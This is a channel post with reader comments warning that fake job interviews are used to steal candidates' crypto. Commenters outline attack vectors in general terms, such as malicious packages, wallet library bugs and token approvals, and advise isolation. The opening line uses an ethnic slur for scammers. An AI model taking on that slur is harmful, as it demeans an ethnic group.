# [ $davids.sh ] · message #299
🤥** Your crypto will be stolen right during the interview** 🤥
Digital gypsies are at it again, but now instead of wallets, they’re dipping their hands into crypto wallets:
Let’s discuss the third point in the comments
#scam #crypto
@ [ $davids.sh ] · # 1966
Link to the original: https://www.linkedin.com/feed/update/urn:li:activity:7343968895298371586/
Most likely, there should be a fake window that requests the seed phrase password, and after entering it, you get in.
Perhaps the mechanism is simpler, this requires a deeper look.
And in principle, this is one of the most beautiful types of social engineering: you come to the scammer yourself, into an environment that distracts from sleight of hand (or code).
And the targeting is so good: candidates who work in crypto, want to get paid in crypto, have crypto.
Mmm, just a sweet deal, not a scheme.
@ Ivan ITK 🚫 · # 1967
Sorry, I'm not omniscient, you just keep picking topics) I've been in cybersecurity consulting for half my life, so I can tell you a lot about the subject) It's not new, it's been around for many years, usually such attacks were carried out by APTs with the aim of stealing commercial and even secret information. Then, when research reports became publicly available, ordinary scammers also became active. Currently, there are simply hundreds of schemes, from simple test ones if you want to work with us, to creating a whole company history on LinkedIn with employees and reviews, and real interviews with live HR drops.
As for the attack vectors themselves, there have been such a diverse number of them in the last 2 years (references to all supply chain attacks and bugs found on GitHub during that time). The simplest way is to inject some kind of package that downloads a binary and runs it with user privileges, doing whatever is needed.
If we consider the crypto case, for example, very recently a bug was fixed in a cryptographic library that was used by almost all decentralized wallets, where it was possible to gain access to the private key (if I'm not mistaken, it was a regular prototype pollution at its core) or there was a bug in the cryptography implementation itself, which allowed recovering the private key. And there are also special confirmations on Ethereum that allow your funds to be debited sometime later. There are special services for checking and revoking such signatures.
Brief summary, in the 21st century, cybersecurity is no longer a separate profession, it is already a necessity for every person. Without delving into theory, you shouldn't be surprised by such cases. And even if you do delve into it, there's always social engineering, which will make you unconsciously give everything to the attackers yourself.
@ Ivan ITK 🚫 · # 1968
Here are the details of what I described above:
@ [ $davids.sh ] · # 1969
In Go, there was a similar incident with downloading binaries recently.
I'm not even sure if it's fixed or if they even can fix it.
I remember that in Deno or Bun there was a feature where when you import a dependency, you have to explicitly state what it can do, but in Go...
I'll have to read up on it.
@ Ivan ITK 🚫 · # 1970
In Node, features have been natively added with flags for permission control, similar to Deno.
@ O. K, ✝️ · # 1971
Is there peace behind seven virtual machines?
@ Ivan ITK 🚫 · # 1972
In today's world, there are too many ways to gain system privileges. There are also sandbox escape schemes for virtual machines.
@ O. K, ✝️ · # 1973
Then, should we separate the physical machines themselves?
@ Ivan ITK 🚫 · # 1974
This will be most effective
@ O. K, ✝️ · # 1975
Thank you for your time
@ Ivan ITK 🚫 · # 1977